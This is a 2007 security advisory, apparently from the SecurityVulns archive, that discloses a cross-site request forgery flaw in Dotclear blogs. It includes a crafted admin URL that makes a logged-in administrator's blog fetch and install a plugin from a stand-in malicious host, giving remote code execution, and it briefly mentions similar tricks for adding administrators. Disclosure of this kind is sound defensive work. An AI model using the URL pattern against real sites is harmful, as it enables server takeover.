Dotclear remote script execution

2007-07-12T00:00:00
ID SECURITYVULNS:DOC:17478
Type securityvulns
Reporter Securityvulns
Modified 2007-07-12T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Hello,

There is a French website about two vulnerabilities ; the one works on Wordpress (27/05/2007) and the other on Dotclear (08/07/2007) :

http://ar3av.free.fr/sommaire.php

If a Dotclear blog administrator is logged in (or has a cookie for automatic identification), you can redirect him (by an image posted in his forum for example) to an URL such as : http://the-dotclear-blog.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng In this case, Dotclear will get, install and activate the plugin http://www.malicious-website.com/malicious-file.pkg.gz It's very easy now to execute arbitrary instructions on the remote server.

A temporary solution is to rename admin's folder ("ecrire" for Dotclear 1 or "admin" for Dotclear 2). There is no official patch at this time.

There is some other examples that allow you to add an administrator, change the website's theme, based on the same concept.

Best regards, Sacha -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGlRWcPiOocQNLzbYRAoFxAJsHoll3YaZPnzUv5gWlh93sNThfLgCeJDFF GIH89HCHRTXaMSf5gbz9NIM= =lnZU -----END PGP SIGNATURE-----